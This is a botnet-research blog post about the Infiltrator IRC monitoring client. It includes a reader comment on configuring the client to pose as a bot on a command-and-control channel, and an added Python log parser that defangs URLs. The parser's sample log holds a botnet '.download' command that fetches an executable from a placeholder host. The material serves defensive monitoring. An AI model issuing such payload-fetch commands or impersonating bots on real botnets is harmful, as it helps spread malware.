Infiltrator Botnet Monitor
Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"
New hunters tend to start by watching IRC networks, then move up to HTTP, P2P, and so on. Many try off-the-shelf IRC clients at first, until they realize the bloat isn't worth it and that keeping an eye on more than a dozen nets that way is practically impossible. Furthermore, connecting to a custom IRCd with an RFC-compliant client will likely raise the suspicions of the botherder.
A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a Python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.
Paul has not had a chance to review the code yet, and my Python is very weak, but I could not see anything too dangerous. Just remember that this client will download URLs seen in the IRC traffic, so do what you can to protect yourself from accidentally running any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. It's missing documentation, but if you have a few minutes, give it a shot!
Labels: Botnet monitoring, Infiltrator, Python

1 Comments:
I found this on "Virus Blog". It may help some of you:
----SNIP----
For those of you playing around with the infiltrator script. Here is some short documentation about how to get started:
* use the "set server" command to set the IP address of the command and control server (e.g. "123.456.789.0")
* use the "set port" command to set the IRC Server port (e.g. "80")
* use the "set nickname" command to set the bot nickname (e.g. "DEU|123456789")
* use the "set usermode" command to set the user mode (e.g. "a a a a:DEU|123456789"). If you do not set the usermode, infiltrator will automatically set it to "worm worm worm worm:[Nickname]".
* use the "set channel" command to set the botnet channel + channel password (e.g. "#botnet password")
* in some cases you need a server password as well, and that's where the command "set password" comes into play.
Now you are done setting up the configuration. Next to do is "start thread" and infiltrator will join and monitor the botnet. To save the current configuration use the command "save configuration".
Stored configuration can be loaded anytime with "load configuration [configName]". To list all stored files use "show stored".
To stop a monitoring thread use the command "stop thread [threadName]". To list the currently running threads use "show threads". To view the last 20 lines of a running thread use "get last [threadName]". The complete log of the thread can be found in the logs directory.
There are some other little features to test, like the talkback feature. If it is enabled, a thread monitoring a channel will start to send messages to the channel if it sees a certain number of messages of one kind appearing. Just play around with it =)
The next version of infiltrator to be released ships with HTTP bot support.
----END----
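The comment above describes how Infiltrator logs a channel to the logs directory, and the post warns that the client fetches URLs it sees. As an added example that is not Infiltrator's code and not from the post or the commenter, here is a small Python parser for raw IRC log lines of the kind such a monitor would write: it splits each line into prefix, command and parameters, pulls out the text of PRIVMSGs, records any URLs in defanged form so nothing is fetched or clicked by accident, and counts how often the same message repeats (the same signal the talkback feature keys on). The log lines are constructed for illustration; the hosts and URLs in them are placeholders.

```python
import re
from collections import Counter

# Constructed sample of raw IRC traffic, as a monitoring client would log it.
# Hosts, nicks and URLs are invented placeholders, not real indicators.
SAMPLE_LOG = [
    ":irc.example.test 001 DEU|123456789 :Welcome to the Internet Relay Network",
    ":herder!op@10.0.0.1 PRIVMSG #botnet :.download http://malware.example.test/update.exe 1",
    ":herder!op@10.0.0.1 PRIVMSG #botnet :.download http://malware.example.test/update.exe 1",
    ":bot7!worm@10.0.0.7 PRIVMSG #botnet :[DOWNLOAD]: Downloaded 12.3KB to update.exe",
    "PING :irc.example.test",
]

# RFC 1459 line shape: optional ":prefix ", then the command, then parameters.
IRC_LINE = re.compile(r'^(?::(?P<prefix>\S+) )?(?P<command>\S+)(?: (?P<params>.*))?$')
URL_RE = re.compile(r'https?://[^\s]+', re.IGNORECASE)


def parse_irc_line(line):
    """Split one raw IRC line into prefix, command and a list of parameters.

    The trailing parameter (introduced by ' :') may contain spaces and is kept whole.
    Returns None for lines that do not look like IRC at all.
    """
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    params = m.group('params') or ''
    if ' :' in params:
        head, trailing = params.split(' :', 1)
        args = head.split() + [trailing]
    elif params.startswith(':'):
        args = [params[1:]]
    else:
        args = params.split()
    return {'prefix': m.group('prefix'), 'command': m.group('command'), 'args': args}


def defang(url):
    """Make a URL non-clickable and non-fetchable for reports: http -> hxxp, '.' -> '[.]'."""
    return url.replace('http', 'hxxp', 1).replace('.', '[.]')


def summarize(lines, repeat_threshold=2):
    """Report PRIVMSG volume, defanged URLs seen, and messages repeated at least
    repeat_threshold times. URLs are recorded only; nothing is ever downloaded."""
    urls = []
    messages = Counter()
    for raw in lines:
        msg = parse_irc_line(raw)
        if not msg or msg['command'] != 'PRIVMSG' or len(msg['args']) < 2:
            continue
        text = msg['args'][1]          # args[0] is the target channel or nick
        messages[text] += 1
        for url in URL_RE.findall(text):
            urls.append(defang(url))
    repeated = {text: n for text, n in messages.items() if n >= repeat_threshold}
    return {
        'privmsg_count': sum(messages.values()),
        'urls': sorted(set(urls)),
        'repeated': repeated,
    }


if __name__ == '__main__':
    report = summarize(SAMPLE_LOG)
    print(f"PRIVMSGs seen: {report['privmsg_count']}")
    for url in report['urls']:
        print(f"URL (defanged): {url}")
    for text, n in report['repeated'].items():
        print(f"repeated x{n}: {text}")
```

Point the script at a log file from the logs directory instead of `SAMPLE_LOG` to get a quick inventory of what a channel pushed while you were watching, without any of the downloaded payloads ever touching the analysis box.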